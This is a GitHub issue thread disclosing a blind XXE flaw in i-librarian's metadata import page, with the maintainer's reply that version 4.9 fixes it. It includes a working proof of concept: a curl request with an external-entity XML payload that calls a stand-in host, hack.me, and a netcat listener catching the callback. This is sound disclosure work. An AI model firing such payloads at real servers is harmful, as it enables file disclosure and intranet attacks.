### ISSUE TITLE
XXE vulnerability

### ISSUE THREAD

**Issue by sn00pyd0g3** [mkucej/i-librarian#116]
https://github.com/mkucej/i-librarian/blob/9535753a84bc615b210802d4c9542db73368d984/importmetadata.php#L139

https://github.com/mkucej/i-librarian/blob/9535753a84bc615b210802d4c9542db73368d984/importmetadata.php#L153

`$_FILES['form_import_file']['tmp_name']` passes into simplexml_load_file() ,
`$_POST['form_import_textarea']` passes into simplexml_load_string().
This creates a Blind [XXE](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) vulnerability.

By XXE, an attacker can read the contents of a file on the target host and attack other hosts on the intranet(SSRF).

POC:
```shell
[sn00py.B0x] ➤ curl --request POST 'http://127.0.0.1/librarian/importmetadata.php' --cookie "PHPSESSID=fvp5dermov0tv3fqtdblc7c677" --data "form_sent=1&file_type=endnote&form_import_file=1" --data-urlencode 'form_import_textarea=<?xml version="1.0"?><!DOCTYPE root [<!ENTITY entity SYSTEM "http://hack.me:1337/xxe_test">]><root>&entity;</root>'
Done. Total items recorded: 0                                                                                                                             
```

```shell
[sn00py.B0x] ➤ nc -l 1337
GET /xxe_test HTTP/1.0
Host: hack.me:1337
User-Agent: curl/7.50.3

```

**Comment by mkucej** [comment]
Thank you for reporting this!

**Comment by sn00pyd0g3** [comment]
May I apply for a CVE ID for this bug😜?

**Comment by mkucej** [comment]
Sure, you do you. :-)

**Comment by mkucej** [comment]
Fixed in 4.9. I could not coax my setup to grab any remote content from an XML, but the provided fix should prevent the XXE vulnerability.
